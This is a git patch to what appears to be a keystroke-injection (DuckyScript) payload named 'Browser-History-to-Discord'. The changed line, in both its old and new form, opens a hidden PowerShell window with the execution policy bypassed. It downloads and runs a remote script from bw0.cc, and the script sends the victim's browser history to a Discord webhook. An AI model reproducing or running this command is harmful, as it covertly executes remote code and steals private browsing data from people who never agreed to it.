From 0090cff196e648a733ce9f44130987fd90b6dedc Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 18 Jun 2025 14:42:24 +0000 Subject: [PATCH] Update Browser-History-to-Discord.txt --- Browser-History-to-Discord/Browser-History-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Browser-History-to-Discord/Browser-History-to-Discord.txt b/Browser-History-to-Discord/Browser-History-to-Discord.txt index 3e2e2fa..d338f49 100644 --- a/Browser-History-to-Discord/Browser-History-to-Discord.txt +++ b/Browser-History-to-Discord/Browser-History-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/hist | iex +STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/hist) ENTER